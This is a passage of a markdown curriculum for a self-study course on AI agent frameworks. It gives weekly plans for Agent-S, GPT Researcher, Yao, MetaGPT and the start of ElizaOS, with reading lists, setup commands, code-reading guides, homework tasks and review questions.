s2_5/ # Intermediate version +├── s1/ # Original version (ICLR 2025) +└── utils.py # Shared utilities +``` + +> **💡 Tip:** Focus entirely on `gui_agents/s3/`. Read the papers' system diagrams first, THEN the code. The code makes 10x more sense with the paper's architecture diagram in front of you. + +> **⚠️ Setup Note:** Agent-S requires a grounding model (UI-TARS-1.5-7B). You can host it on Hugging Face Inference Endpoints (~$1-2/hr for A10G), use a free tier if available, or run it locally if you have a capable GPU (16GB+ VRAM). Alternatively, study the code architecture without running the full system. 
+ +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] The full [README](https://github.com/simular-ai/Agent-S) +- [ ] [S3 blog post](https://www.simular.ai/articles/agent-s3) — accessible overview +- [ ] **S1 Paper** (at least abstract + Sections 1-3) — core architecture concepts +- [ ] **S3 Paper** (abstract + architecture section) — latest improvements +- [ ] `models.md` in the repo — supported model configurations + +**Identify core abstractions:** +- **Screenshot Capture** — the agent "sees" the screen as an image +- **Grounding Model** (UI-TARS) — converts screenshots to UI element locations +- **Planning Agent** — decides what to do based on current screen + goal +- **Execution Agent** — translates plans into mouse/keyboard actions +- **Behavior Best-of-N (bBoN)** — run multiple rollouts, pick the best + +**The pipeline:** +``` +Task → Screenshot → Grounding (UI-TARS: identify elements) → Planning (LLM: what to do) → Action (click/type/scroll) → New Screenshot → Loop +``` + +- [ ] **📝 Homework:** Write architecture summary at `~/agent-study/notes/week3-architecture.md` + - Include the screenshot→grounding→planning→action pipeline + - Explain bBoN and why it matters (72.6% vs 66% on OSWorld) + - Compare: how is "seeing" a screen different from "calling" an API? 
+ +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +cd ~/agent-study/week3-agent-s +python -m venv .venv && source .venv/bin/activate +pip install gui-agents +brew install tesseract # Required dependency (macOS; on Debian/Ubuntu: sudo apt install tesseract-ocr) +``` + +**API configuration:** +```bash +export OPENAI_API_KEY="your-openai-api-key" +export ANTHROPIC_API_KEY="your-anthropic-api-key" +export HF_TOKEN="your-huggingface-token" +``` + +**Run Agent-S3 (if you have grounding model access):** +```bash +agent_s \ + --provider openai \ + --model gpt-4o \ + --ground_provider huggingface \ + --ground_url "https://your-ui-tars-endpoint" \ + --ground_model ui-tars-1.5-7b \ + --grounding_width 1920 \ + --grounding_height 1080 +``` + +> **If you can't run it:** Read through `gui_agents/s3/cli_app.py` line by line and trace the execution flow. Understand what WOULD happen at each step. + +- [ ] **📝 Homework:** Even if you can't run the full agent, build a minimal screenshot → analysis script: + ```python + # Take a screenshot, send it to a vision model, get a description of UI elements + # This exercises the same "visual grounding" concept, just simplified + ``` + - Save at `~/agent-study/week3-agent-s/hello_agent.py` + +--- + +### Day 3 (Wednesday): Intermediate Build — Understanding Computer Use + +**Work through:** +- [ ] Read `gui_agents/s3/agents/` — understand the multi-agent architecture +- [ ] Read `gui_agents/s3/core/` — how screenshots are captured and actions are executed +- [ ] Study the prompt templates in `gui_agents/s3/` — how the LLM is instructed +- [ ] Understand the bBoN strategy in `gui_agents/s3/bbon/` + +**Key concepts:** +- How screenshots are processed and annotated for the LLM +- How the grounding model converts visual elements to coordinates +- How actions (click, type, scroll) are executed on the OS level +- Cross-platform differences (Linux/Mac/Windows) +- The local coding environment feature + +- [ ] **📝 Homework:** Build something that uses the computer-use paradigm: + - **Option A (with GPU):** Give Agent-S a simple task (open a browser, search for something, copy 
a result) + - **Option B (without GPU):** Build a simplified "screen reader" agent that takes a screenshot, uses a vision model to understand the UI, and outputs a structured description of what's on screen + suggested next actions + - Save at `~/agent-study/week3-agent-s/computer_use_demo/` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files (in order):** +1. `gui_agents/s3/cli_app.py` — Main entry point, execution loop +2. `gui_agents/s3/agents/` — Each agent role (planner, executor, grounding) +3. `gui_agents/s3/core/` — Screenshot capture, action execution, state management +4. `gui_agents/s3/bbon/` — Behavior Best-of-N implementation +5. `gui_agents/s1/` (briefly) — Compare S1 architecture to S3 to see evolution + +**Explore the papers' techniques:** +- [ ] How does "experience-augmented hierarchical planning" work? (S1) +- [ ] What's the "Mixture of Grounding" approach? (S2) +- [ ] How does S3 achieve simplicity while improving performance? + +- [ ] **📝 Homework:** Write "What I'd Steal from Agent-S" at `~/agent-study/notes/week3-steal.md` + - Focus on: The screenshot→grounding→action pipeline, bBoN strategy, cross-platform abstractions + - Think about: Could you add computer-use capabilities to a Pydantic-AI agent as a tool? + +--- + +### Day 5 (Friday): Integration Project + Reflection + +- [ ] **Build a mini-project:** + - **Suggested:** A "screen monitoring" agent that periodically screenshots your desktop, uses a vision model to understand what's happening, and logs structured summaries (using Pydantic-AI for the structured output!) + - **Alternative:** Build a browser automation agent using Playwright + vision model (a simplified version of Agent-S's approach) + - Save at `~/agent-study/week3-agent-s/integration_project/` + +- [ ] **Write retrospective** at `~/agent-study/notes/week3-retro.md` +- [ ] **Update comparison matrix** + +### 🎯 Key Questions: + +1. 
What is the screenshot → grounding → action pipeline and why is it powerful? +2. Why does Agent-S need a separate grounding model (UI-TARS) in addition to the planning LLM? +3. What is Behavior Best-of-N and how does it improve OSWorld performance by ~6.6 percentage points (72.6% vs 66%)? +4. How is computer-use fundamentally different from API-based agent frameworks? +5. What are the security implications of an agent that can control your mouse and keyboard? +6. What's the difference between Agent-S's approach and Anthropic's Computer Use or OpenAI's Operator? +7. When would you use computer-use agents vs. API-based agents? Give 3 examples of each. + +--- + +## Week 4: GPT Researcher + +> **Difficulty:** ⭐⭐ (Straightforward architecture, well-documented, familiar patterns) +> **Repo:** [github.com/assafelovic/gpt-researcher](https://github.com/assafelovic/gpt-researcher) +> **Stars:** 25k | **Language:** Python + +### Why This Is Week 4 + +After 3 weeks of studying *how* agents work internally, this week is about studying a *complete, purpose-built* agent that does one thing extremely well: research. GPT Researcher is the best example of the "Plan-and-Solve + RAG" pattern — a design you'll reuse in your own projects. + +### Resources + +| Resource | Link | +|----------|------| +| 📖 Documentation | [docs.gptr.dev](https://docs.gptr.dev/docs/gpt-researcher/getting-started) | +| 💬 Discord | [Discord](https://discord.gg/QgZXvJAccX) | +| 📦 PyPI | [gpt-researcher](https://pypi.org/project/gpt-researcher/) | +| 📝 Blog: How it was built | [docs.gptr.dev/blog](https://docs.gptr.dev/blog/building-gpt-researcher) | +| 🎥 Demo | [YouTube](https://www.youtube.com/watch?v=f60rlc_QCxE) | +| 🔧 MCP Integration | [MCP Guide](https://docs.gptr.dev/docs/gpt-researcher/retrievers/mcp-configs) | +| 📜 Plan-and-Solve Paper | [arxiv.org/abs/2305.04091](https://arxiv.org/abs/2305.04091) | + +### 🗂 Source Code Guide + +``` +gpt_researcher/ +├── agent.py # ⭐ THE file. 
GPTResearcher class — the entire research orchestration +├── actions/ # ⭐ Research actions (generate questions, search, scrape, synthesize) +│ ├── query_processing.py # How research questions are generated from the user query +│ ├── web_search.py # Web search execution +│ └── report_generation.py # Final report synthesis +├── config/ # Configuration management +│ └── config.py # All configurable parameters +├── context/ # ⭐ Context management — how gathered info is stored/retrieved +│ └── compression.py # How context is compressed to fit token limits +├── document/ # Document processing (PDF, web pages, etc.) +├── memory/ # ⭐ Research memory — how the agent remembers what it's found +├── orchestrator/ # ⭐ Deep research — recursive tree exploration +│ └── agent/ # Sub-agents for deep research mode +├── retrievers/ # ⭐ Web/local search implementations (Tavily, DuckDuckGo, MCP, etc.) +└── scraper/ # Web scraping implementations +``` + +> **💡 Tip:** `agent.py` is the heart. It's one file, ~700 lines, and it contains the entire research orchestration. Read it top to bottom. Then read `actions/` to understand each step. 
+ +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] Full [README](https://github.com/assafelovic/gpt-researcher) +- [ ] [How it was built](https://docs.gptr.dev/blog/building-gpt-researcher) — the design blog post +- [ ] [Getting Started](https://docs.gptr.dev/docs/gpt-researcher/getting-started) +- [ ] [Customization docs](https://docs.gptr.dev/docs/gpt-researcher/gptr/config) + +**Understand the Plan-and-Solve architecture:** +``` +User Query + → Planner Agent: Generate N research questions + → For each question: + → Crawler Agent: Search web, gather sources + → Summarizer: Extract relevant info from each source + → Source tracker: Track citations + → Publisher Agent: Aggregate all findings into a report +``` + +**Deep Research mode adds recursion:** +``` +User Query → Generate sub-topics → For each sub-topic → Generate deeper sub-topics → ... → Aggregate bottom-up +``` + +- [ ] **📝 Homework:** Write architecture summary at `~/agent-study/notes/week4-architecture.md` + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +cd ~/agent-study/week4-gpt-researcher +python -m venv .venv && source .venv/bin/activate +pip install gpt-researcher + +# Set required API keys +export OPENAI_API_KEY="your-openai-api-key" +export TAVILY_API_KEY="your-tavily-api-key" +``` + +**Run the simplest version:** +```python +from gpt_researcher import GPTResearcher +import asyncio + +async def main(): + query = "What are the latest advancements in AI agent frameworks in 2025-2026?" 
+ researcher = GPTResearcher(query=query) + research_result = await researcher.conduct_research() + report = await researcher.write_report() + print(report) + +asyncio.run(main()) +``` + +**Also try the web UI:** +```bash +git clone https://github.com/assafelovic/gpt-researcher.git +cd gpt-researcher +pip install -r requirements.txt +python -m uvicorn main:app --reload +# Visit http://localhost:8000 +``` + +- [ ] **📝 Homework:** Build a minimal research agent from scratch — NO copy-paste + - Save at `~/agent-study/week4-gpt-researcher/hello_researcher.py` + +--- + +### Day 3 (Wednesday): Intermediate Build — Deep Research + MCP + +**Focus: GPT Researcher's key differentiators — Deep Research mode and MCP integration** + +**Work through:** +- [ ] [Deep Research docs](https://docs.gptr.dev/docs/gpt-researcher/gptr/deep-research) +- [ ] [MCP Integration Guide](https://docs.gptr.dev/docs/gpt-researcher/retrievers/mcp-configs) +- [ ] [Local document research](https://docs.gptr.dev/docs/gpt-researcher/gptr/local-docs) +- [ ] Run a Deep Research query and observe the recursive tree exploration + +**Key concepts:** +- How Deep Research recursively explores sub-topics +- How MCP connects GPT Researcher to external data sources +- How context compression prevents token limit issues +- How source tracking and citations work +- The difference between web research and local document research + +- [ ] **📝 Homework:** Build a research agent that uses GPT Researcher's unique capabilities: + - **Must include:** MCP integration with at least one external source (e.g., GitHub MCP server) + - **OR:** Research over local documents (PDFs, markdown files from your study notes) + - **Bonus:** Use Deep Research mode for a complex topic + - Save at `~/agent-study/week4-gpt-researcher/deep_research_demo.py` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files (in order):** +1. 
`gpt_researcher/agent.py` — The entire GPTResearcher class, top to bottom +2. `gpt_researcher/actions/query_processing.py` — How research questions are generated +3. `gpt_researcher/context/compression.py` — How context is managed within token limits +4. `gpt_researcher/orchestrator/` — Deep research recursive tree implementation +5. `gpt_researcher/retrievers/` — How different search providers are integrated + +**Understand:** +- [ ] How the planner decomposes a query into research questions +- [ ] How the agent handles rate limiting and API failures +- [ ] How context compression works (this is critical for long research) +- [ ] How the orchestrator manages the recursive tree in Deep Research mode +- [ ] How the report generator synthesizes multiple sources into a coherent report + +- [ ] **📝 Homework:** Write "What I'd Steal from GPT Researcher" at `~/agent-study/notes/week4-steal.md` + - Focus on: Plan-and-Solve decomposition, context compression, source tracking, recursive exploration + - Compare: how would you build "deep research" capability into a Pydantic-AI agent? + +--- + +### Day 5 (Friday): Integration Project + Reflection + +- [ ] **Build a mini-project:** + - **Suggested:** A "competitive analysis" agent — given a company/product, it researches competitors, pricing, features, and generates a structured comparison report. Use GPT Researcher's engine + Pydantic-AI for structured output. + - **Alternative:** Install GPT Researcher as a [Claude Skill](https://skills.sh/assafelovic/gpt-researcher/gpt-researcher) and use it in your Claude workflow + - Save at `~/agent-study/week4-gpt-researcher/integration_project/` + +- [ ] **Write retrospective** at `~/agent-study/notes/week4-retro.md` +- [ ] **Update comparison matrix** + +### 🎯 Key Questions: + +1. What is the Plan-and-Solve pattern and how does GPT Researcher implement it? +2. How does Deep Research differ from regular research? Draw the tree structure. +3. 
How does context compression prevent token limit issues during long research? +4. How does GPT Researcher track and cite sources? +5. What search providers does GPT Researcher support and how do you add a new one? +6. How could you combine GPT Researcher with Pydantic-AI for structured research outputs? +7. What are the limitations of automated research (hallucination, bias, recency)? + +--- + +## Week 5: Yao + +> **Difficulty:** ⭐⭐⭐⭐ (Go language, novel architecture, less documentation, paradigm shift) +> **Repo:** [github.com/YaoApp/yao](https://github.com/YaoApp/yao) +> **Stars:** 7.5k | **Language:** Go | **Runtime:** Single binary with V8 engine + +### Why This Is Week 5 + +Yao is the most architecturally unique repo in the entire study. It's not a chatbot framework — it's an **autonomous agent engine** where agents are triggered by events, schedules, and emails. This is the only Go-based framework, the only one with event-driven architecture, and the only one that deploys as a single binary. If everything else is "AI assistant," Yao is "AI team member." + +> **⚠️ Language Note:** This week requires Go. If you don't know Go, spend an extra hour on Day 1 doing the [Go Tour](https://go.dev/tour/). You don't need to be fluent — just enough to read the source code. + +### Resources + +| Resource | Link | +|----------|------| +| 🏠 Homepage | [yaoapps.com](https://yaoapps.com) | +| 📖 Documentation | [yaoapps.com/docs](https://yaoapps.com/docs) | +| 🚀 Quick Start | [Getting Started](https://yaoapps.com/docs/documentation/en-us/getting-started) | +| ✨ Why Yao? 
| [Why Yao](https://yaoapps.com/docs/documentation/en-us/getting-started/why-yao) | +| 🤖 Agent Examples | [YaoAgents/awesome](https://github.com/YaoAgents/awesome) | +| 📦 Install Script | `curl -fsSL https://yaoapps.com/install.sh \| bash` | +| 🐹 Go Tour (if needed) | [go.dev/tour](https://go.dev/tour/) | + +### 🗂 Source Code Guide + +``` +yao/ +├── engine/ +│ └── process.go # ⭐ Process engine — core concept in Yao +├── agent/ # ⭐ Agent framework — autonomous agent definitions +│ ├── agent.go # Agent lifecycle, trigger modes, execution phases +│ └── triggers/ # Clock, Human, Event trigger implementations +├── runtime/ +│ └── v8/ # ⭐ Built-in V8 JavaScript/TypeScript engine +├── rag/ +│ └── graph/ # ⭐ Built-in GraphRAG implementation +├── mcp/ # MCP integration +├── api/ # HTTP server and REST API +├── model/ # ORM and database layer +└── cmd/ + └── yao/ + └── main.go # Application entry point +``` + +> **💡 Tip:** Yao's DSL-based approach means you'll be reading `.yao` files (YAML-like definitions) as much as Go source code. The mental model is: you define agents as data (DSL), and the engine executes them. + +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] Full [README](https://github.com/YaoApp/yao) +- [ ] [Why Yao?](https://yaoapps.com/docs/documentation/en-us/getting-started/why-yao) +- [ ] [Documentation overview](https://yaoapps.com/docs) +- [ ] Skim the Go source: `cmd/yao/main.go` → `engine/process.go` → `agent/agent.go` + +**Understand Yao's radical differences:** + +| Traditional Agent | Yao Agent | +|-------------------|-----------| +| Entry point: chatbox | Entry point: email, events, schedules | +| Passive: you ask, it answers | Proactive: it works autonomously | +| Role: tool | Role: team member | + +**The six-phase execution model:** +``` +Inspiration → Goals → Tasks → Run → Deliver → Learn +``` + +**Three trigger modes:** +1. **Clock** — scheduled tasks (cron-like) +2. **Human** — triggered by email or messages +3. 
**Event** — triggered by webhooks or database changes + +- [ ] **📝 Homework:** Write architecture summary at `~/agent-study/notes/week5-architecture.md` + - Focus on: How the event-driven model is fundamentally different from request-response + - Compare: 6-phase execution vs Pydantic-AI's run loop vs MS Agent Framework's graph + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +# Install Yao (single binary!) +curl -fsSL https://yaoapps.com/install.sh | bash + +# Create a project +cd ~/agent-study/week5-yao +mkdir project && cd project +yao start # First run creates project structure +# Visit http://127.0.0.1:5099 +``` + +**Run your first process:** +```bash +yao run utils.app.Ping # Returns version +yao run scripts.tests.Hello 'Hello, Yao!' # Run TypeScript +yao run models.tests.pet.Find 1 '::{}' # Query database +``` + +**Understand core concepts:** +- [ ] **Processes** — functions that can be run directly or referenced in code +- [ ] **Models** — database models defined in `.mod.yao` files +- [ ] **Scripts** — TypeScript/JavaScript code executed by the built-in V8 engine +- [ ] **DSL** — Yao's declarative syntax for defining everything + +- [ ] **📝 Homework:** Build the simplest Yao application from scratch: + - Define a model, write a process, create a simple API endpoint + - Save project at `~/agent-study/week5-yao/hello_project/` + +--- + +### Day 3 (Wednesday): Intermediate Build — Event-Driven Agents + +**Focus: What makes Yao unique — event-driven, proactive agents** + +**Work through:** +- [ ] Agent configuration — defining agents with roles and triggers +- [ ] Setting up a scheduled (Clock) trigger +- [ ] Setting up an Event trigger (webhook → agent action) +- [ ] MCP integration — connecting external tools +- [ ] GraphRAG — how the built-in knowledge graph works + +**Key concepts:** +- How agents are defined declaratively (vs. 
programmatically in Python frameworks) +- How the three trigger modes work in practice +- How agents learn from past executions (the "Learn" phase) +- How GraphRAG combines vector search with graph traversal +- Why a single binary matters for deployment + +- [ ] **📝 Homework:** Build an event-driven agent: + - **Must include:** At least 2 different trigger modes (e.g., Clock + Event) + - **Must include:** An agent that does something proactively (not just responding to a chat) + - Example idea: An agent that checks an RSS feed on a schedule (Clock), processes new articles (Run), and stores summaries in the knowledge base (Learn/Deliver) + - Save at `~/agent-study/week5-yao/event_agent/` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files (in order):** +1. `cmd/yao/main.go` — Application entry point, how the single binary initializes +2. `engine/process.go` — The process engine (core execution abstraction) +3. `agent/agent.go` — Agent lifecycle and execution phases +4. `runtime/v8/` — How the V8 engine is embedded for TypeScript support +5. `rag/graph/` — GraphRAG implementation (vector + graph hybrid search) + +**Understand:** +- [ ] How Go's concurrency model (goroutines) enables event-driven agents +- [ ] How the V8 engine is embedded and used for TypeScript execution +- [ ] How GraphRAG combines embedding search with entity-relationship traversal +- [ ] How a single Go binary includes all these features without external dependencies + +- [ ] **📝 Homework:** Write "What I'd Steal from Yao" at `~/agent-study/notes/week5-steal.md` + - Focus on: Event-driven architecture, single binary deployment, GraphRAG, DSL approach + - Think about: Could you add event-driven capabilities to a Python agent framework? 
+ +--- + +### Day 5 (Friday): Integration Project + Reflection + +- [ ] **Build a mini-project:** + - **Suggested:** A "daily briefing" agent — schedule it to run every morning, have it gather data from APIs (weather, calendar, news), process it, and output a structured briefing. Use the Clock trigger + MCP for external data. + - **Alternative:** Build a webhook-triggered agent that processes incoming data and stores it in GraphRAG + - Save at `~/agent-study/week5-yao/integration_project/` + +- [ ] **Write retrospective** at `~/agent-study/notes/week5-retro.md` +- [ ] **Update comparison matrix** + +### 🎯 Key Questions: + +1. How does Yao's event-driven model differ from the request-response model of every other framework? +2. What are the three trigger modes and when would you use each? +3. What is the six-phase execution model and how does the "Learn" phase create a feedback loop? +4. Why is single-binary deployment a significant advantage? Where would you deploy Yao that you couldn't deploy Python frameworks? +5. How does Yao's built-in GraphRAG differ from vector-only RAG? +6. What does it mean that Yao embeds a V8 engine? What are the implications for extensibility? +7. What types of applications is Yao best suited for vs. worst suited for? + +--- + +## Week 6: MetaGPT + +> **Difficulty:** ⭐⭐⭐ (Large codebase, academic concepts, multi-agent complexity) +> **Repo:** [github.com/FoundationAgents/MetaGPT](https://github.com/FoundationAgents/MetaGPT) +> **Stars:** 63k | **Language:** Python | **Papers:** ICLR 2024 + many more + +### Why This Is Week 6 + +MetaGPT is the OG multi-agent framework and the capstone of your study. It introduces Standard Operating Procedures (SOPs) as the coordination mechanism — a genuinely novel idea that maps human organizational structures onto AI agents. By Week 6, you have enough context from the previous 5 frameworks to deeply appreciate what MetaGPT does differently. 
+ +### Resources + +| Resource | Link | +|----------|------| +| 📖 Documentation | [docs.deepwisdom.ai](https://docs.deepwisdom.ai/main/en/) | +| 💬 Discord | [Discord](https://discord.gg/ZRHeExS6xv) | +| 📦 PyPI | [metagpt](https://pypi.org/project/metagpt/) | +| 🎯 MGX (commercial product) | [mgx.dev](https://mgx.dev/) | +| 📄 MetaGPT Paper (ICLR 2024) | [openreview.net](https://openreview.net/forum?id=VtmBAGCN7o) | +| 📄 AFlow Paper (ICLR 2025 Oral) | [openreview.net](https://openreview.net/forum?id=z5uVAKwmjf) | +| 📝 Agent 101 Tutorial | [Agent 101](https://docs.deepwisdom.ai/main/en/guide/tutorials/agent_101.html) | +| 📝 MultiAgent 101 | [MultiAgent 101](https://docs.deepwisdom.ai/main/en/guide/tutorials/multi_agent_101.html) | +| 🤗 HuggingFace Demo | [MetaGPT Space](https://huggingface.co/spaces/deepwisdom/MetaGPT-SoftwareCompany) | + +### 🗂 Source Code Guide + +``` +metagpt/ +├── roles/ # ⭐ Role definitions — each role = one agent with a job +│ ├── role.py # ⭐ Base Role class — THE core abstraction +│ ├── architect.py # Software architect agent +│ ├── engineer.py # Software engineer agent +│ ├── product_manager.py # Product manager agent +│ ├── project_manager.py # Project manager agent +│ └── di/ +│ └── data_interpreter.py # Data analysis agent +├── actions/ # ⭐ Action definitions — what roles can do +│ ├── action.py # Base Action class +│ ├── write_prd.py # Write Product Requirements Document +│ ├── write_design.py # Write system design +│ └── write_code.py # Write code +├── team.py # ⭐ Team orchestration — how roles collaborate via SOPs +├── environment.py # ⭐ Shared environment — message passing between roles +├── schema.py # Message schemas for inter-role communication +├── config2.py # Configuration management +├── base/ # Base classes and utilities +├── memory/ # Memory management for roles +├── software_company.py # ⭐ The "software company" end-to-end pipeline +└── utils/ + └── project_repo.py # Project repository management +``` + +> **💡 Tip:** The mental 
model is: **Role** (who) performs **Actions** (what) according to **SOPs** (how). Read `roles/role.py` first, then `actions/action.py`, then `team.py`. That's the holy trinity of MetaGPT. + +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] Full [README](https://github.com/FoundationAgents/MetaGPT) +- [ ] [Agent 101 Tutorial](https://docs.deepwisdom.ai/main/en/guide/tutorials/agent_101.html) +- [ ] [MultiAgent 101 Tutorial](https://docs.deepwisdom.ai/main/en/guide/tutorials/multi_agent_101.html) +- [ ] MetaGPT paper (abstract + Sections 1-3) — the SOP concept +- [ ] Skim the [AFlow paper](https://openreview.net/forum?id=z5uVAKwmjf) abstract — automated workflow generation + +**Core philosophy:** `Code = SOP(Team)` + +**Identify core abstractions:** +- **Role** — an agent with a specific job (PM, architect, engineer, etc.) +- **Action** — a discrete task a role can perform (write PRD, write code, etc.) +- **SOP** — Standard Operating Procedures that define the workflow between roles +- **Team** — the orchestrator that manages roles and message passing +- **Environment** — shared context where roles publish and subscribe to messages +- **Message** — typed communication between roles + +**The "software company" pipeline:** +``` +User Requirement + → Product Manager (writes PRD) + → Architect (writes system design) + → Project Manager (creates task breakdown) + → Engineer (writes code) + → QA (tests code) +``` + +- [ ] **📝 Homework:** Write architecture summary at `~/agent-study/notes/week6-architecture.md` + - Explain the SOP model and how it maps to human organizations + - Compare: SOP coordination vs Graph workflows (MS) vs Event-driven (Yao) vs Linear (Pydantic-AI) + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +cd ~/agent-study/week6-metagpt +conda create -n metagpt python=3.11 && conda activate metagpt +pip install --upgrade metagpt +metagpt --init-config # Creates ~/.metagpt/config2.yaml +# Edit the config 
to add your API key +``` + +**Run the classic demo:** +```bash +metagpt "Create a snake game" # This will generate a full project in ./workspace +``` + +**Also try programmatically:** +```python +from metagpt.software_company import generate_repo +from metagpt.utils.project_repo import ProjectRepo + +repo: ProjectRepo = generate_repo("Create a simple calculator app") +print(repo) +``` + +**And try the Data Interpreter:** +```python +import asyncio +from metagpt.roles.di.data_interpreter import DataInterpreter + +async def main(): + di = DataInterpreter() + await di.run("Run data analysis on sklearn Iris dataset, include a plot") + +asyncio.run(main()) +``` + +- [ ] **📝 Homework:** Build a custom role from scratch — NO copy-paste: + - Define a new `Role` subclass with custom `Action`s + - Example: a "ResearchAnalyst" role that takes a topic and produces a structured analysis + - Save at `~/agent-study/week6-metagpt/hello_role.py` + +--- + +### Day 3 (Wednesday): Intermediate Build — Multi-Agent SOPs + +**Focus: MetaGPT's unique capability — SOP-based multi-agent coordination** + +**Work through:** +- [ ] [MultiAgent 101](https://docs.deepwisdom.ai/main/en/guide/tutorials/multi_agent_101.html) +- [ ] Look at the [Debate example](https://docs.deepwisdom.ai/main/en/guide/use_cases/multi_agent/debate.html) +- [ ] Understand how messages flow between roles via the Environment +- [ ] Understand how the SOP defines which role acts after which + +**Key concepts:** +- How roles subscribe to message types from other roles +- How the Team orchestrator manages turn-taking +- How the Environment enables publish/subscribe communication +- How SOPs encode workflow logic without explicit graph definitions +- The difference between the "software company" SOP and custom SOPs + +- [ ] **📝 Homework:** Build a multi-agent system with a custom SOP: + - **Must include:** At least 3 custom roles with different responsibilities + - **Must include:** Custom message types between roles + - 
**Must include:** A clear SOP workflow (Role A → Role B → Role C) + - Example idea: A "content creation team" — Researcher (gathers info) → Writer (drafts article) → Editor (reviews and improves) → Publisher (formats final output) + - Save at `~/agent-study/week6-metagpt/multi_agent_sop.py` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files (in order):** +1. `metagpt/roles/role.py` — Base Role class, how roles think and act +2. `metagpt/actions/action.py` — Base Action class, how actions execute +3. `metagpt/team.py` — Team orchestration, turn management +4. `metagpt/environment.py` — Message passing, pub/sub system +5. `metagpt/schema.py` — Message types and schemas + +**Also explore:** +- [ ] `metagpt/roles/engineer.py` — how the Engineer role writes code (complex action chain) +- [ ] `metagpt/software_company.py` — the end-to-end pipeline +- [ ] `metagpt/memory/` — how roles maintain memory across turns +- [ ] `examples/` — AFlow and SPO implementations + +**Advanced concepts:** +- [ ] How does AFlow (Automated Agentic Workflow Generation) work? +- [ ] What is SPO (Self-Play Optimization)? +- [ ] How does the Data Interpreter differ from the Software Company pipeline? + +- [ ] **📝 Homework:** Write "What I'd Steal from MetaGPT" at `~/agent-study/notes/week6-steal.md` + - Focus on: SOP-based coordination, Role/Action abstraction, message-passing environment + - Reflect on: Which coordination model do you prefer? Graph (MS) vs SOP (MetaGPT) vs Event (Yao)? + +--- + +### Day 5 (Friday): Integration Project + Final Reflection + +- [ ] **Build a mini-project:** + - **Suggested:** A multi-agent system that takes a business idea and produces a full analysis: Market Researcher role → Business Analyst role → Financial Modeler role → Report Writer role. Each produces a structured output that feeds into the next. 
+ - Save at `~/agent-study/week6-metagpt/integration_project/` + +- [ ] **Write final retrospective** at `~/agent-study/notes/week6-retro.md` + - This one should be more comprehensive — reflect on ALL 6 weeks + - What framework would you reach for first? When? + - What surprised you most across the study? + +- [ ] **Complete comparison matrix** — all 6 frameworks +- [ ] **Commit and push everything** to your study git repo + +### 🎯 Key Questions: + +1. What does "Code = SOP(Team)" mean concretely? +2. How does the Role/Action/SOP model map to real organizational structures? +3. How do messages flow between roles? What's the pub/sub mechanism? +4. What's the difference between MetaGPT's approach and MS Agent Framework's graph workflows? +5. How does the Data Interpreter feature differ from the Software Company pipeline? +6. What is AFlow and why was it accepted as an oral presentation at ICLR 2025? +7. When would you use MetaGPT vs simpler single-agent frameworks? +8. Across all 6 frameworks, which coordination model (linear/graph/SOP/event) do you think is most general? + +--- + +## Week 7: ElizaOS + +> **Timeline:** 1 week | **Difficulty:** ⭐⭐ | **Goal:** Learn agent deployment & multi-platform distribution +> **Repo:** [elizaOS/eliza](https://github.com/elizaOS/eliza) | ⭐ 17,476 | TypeScript +> **Why this week:** Weeks 1-6 taught you how to BUILD agents. This week teaches you how to DEPLOY them where users actually are. 
+ +### Why ElizaOS Makes The Cut + +After a thorough debate (see the [deep dive analysis](./trending-repos-deep-dive.md)), ElizaOS earned its spot because: +- It's the **only deployment-focused platform** on the trending list — multi-platform routing (Discord, Telegram, Twitter, Farcaster) in one framework +- **17k stars** with active development and a large community +- The plugin architecture, character system, and platform adapters teach **real deployment patterns** you won't learn from any other framework studied +- Knowing how to ship agents to where users live is as important as knowing how to build them + +### Resources + +| Resource | URL | +|----------|-----| +| **GitHub** | https://github.com/elizaOS/eliza | +| **Docs** | https://elizaos.github.io/eliza/ | +| **Discord** | https://discord.gg/elizaos | +| **Quickstart** | https://elizaos.github.io/eliza/docs/quickstart | + +### Key Source Files to Read + +| File | Why It Matters | +|------|---------------| +| `packages/core/src/runtime.ts` | The AgentRuntime — the central brain that coordinates everything | +| `packages/core/src/types.ts` | All the core interfaces (Character, Memory, Action, Provider, Evaluator) | +| `packages/plugin-discord/src/index.ts` | How a platform adapter is built — the Discord integration | +| `packages/plugin-telegram/src/index.ts` | Compare with Discord adapter — spot the platform abstraction pattern | +| `packages/core/src/memory.ts` | Memory management — how agents maintain context across platforms | +| `agent/src/index.ts` | The entry point — how everything gets wired together | + +--- + +### Day 1 (Monday): Architecture Deep Dive — The Deployment Platform + +**Study (1-2 hrs):** +- Read the full README and quickstart docs +- Understand the core architecture: + - **Character files** — how agent personalities are defined (JSON-based) + - **AgentRuntime** — the central coordinator + - **Plugins** — how platform adapters, actions, and providers are registered + - **Actions vs 
Evaluators vs Providers** — the three extension points + - **Memory** — how conversation state persists across platforms +- Study the plugin system architecture — how does one agent connect to Discord AND Telegram simultaneously? +- Understand the character file format — what can you configure? + +**Key Questions:** +- How does ElizaOS route a message from Discord to the right agent and back? +- What's the difference between an Action, an Evaluator, and a Provider? +- How does the memory system work across platforms? Can an agent remember a Discord convo when talking on Telegram? +- How does the character file influence agent behavior vs hard-coded logic? + +**Homework:** +- [ ] Write a 1-page architecture summary covering: runtime → plugins → adapters → memory → character system +- [ ] Draw a diagram showing message flow: User sends Discord message → ... → Agent responds +- [ ] Compare the architecture to Pydantic-AI's approach — what's different about a "deployment-first" vs "logic-first" framework? + +--- + +### Day 2 (Tuesday): Hello World — Deploy an Agent to Discord + +**Study (1-2 hrs):** +- Set up the ElizaOS development environment + - Clone the repo, install deps (`pnpm install`) + - Create a Discord bot in the Discord Developer Portal (you'll need a test server) + - Set up your `.env` with Discord bot token and an LLM API key +- Create a custom character file for your agent: + - Define name, bio, personality traits, example conversations + - Set the model provider and 